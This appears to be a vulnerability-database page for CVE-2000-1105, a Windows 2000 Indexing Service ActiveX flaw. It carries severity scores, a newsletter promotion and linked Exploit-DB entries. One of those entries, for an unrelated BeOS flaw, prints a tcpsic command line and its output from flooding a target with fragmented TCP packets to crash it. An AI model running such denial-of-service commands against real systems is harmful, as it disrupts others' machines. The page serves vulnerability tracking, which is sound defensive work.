CVE-2000-1105
published 2001-01-09CVE-2000-1105: The ixsso.query ActiveX Object is marked as safe for scripting, which allows malicious web site operators to embed a script that remotely determines the…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCPINAN
EXPLOIT
EPSS
10.46%
95.2th percentile
The ixsso.query ActiveX Object is marked as safe for scripting, which allows malicious web site operators to embed a script that remotely determines the existence of files on visiting Windows 2000 systems that have Indexing Services enabled.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Indexing Service (Windows 2000) - File Verification
exploitdb·2000-11-10
CVE-2000-1105 Microsoft Indexing Service (Windows 2000) - File Verification
Microsoft Indexing Service (Windows 2000) - File Verification
---
Demo - IE 5.x Win2000 Indexing service vulnerability
Demo - IE 5.x Win2000 Indexing service vulnerability
Legal Notice:
This Advisory and Demonstration is Copyright (c) 2000 Georgi Guninski. You may distribute
it unmodified. You may not modify it and distribute it or distribute parts
of it without the author's written permission.
Disclaimer:
The opinions expressed in this advisory and program are my own and
not of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this advisory or program.
Georgi Guninski, bears no responsibility for content or misuse of this
advisory
Exploit-DB
BeOS 5.0 - TCP Fragmentation Remote Denial of Service
exploitdb·2000-05-18
CVE-2000-0463 BeOS 5.0 - TCP Fragmentation Remote Denial of Service
BeOS 5.0 - TCP Fragmentation Remote Denial of Service
---
source: https://www.securityfocus.com/bid/1222/info
BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot.
[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0
-I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Frag'd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%
1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337
Wrote 5002 pack
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/win2ksecadvice/2000-q4/0074.htmlhttp://www.securityfocus.com/archive/1/144270http://www.securityfocus.com/bid/1933http://archives.neohapsis.com/archives/win2ksecadvice/2000-q4/0074.htmlhttp://www.securityfocus.com/archive/1/144270http://www.securityfocus.com/bid/1933
2001-01-09
Published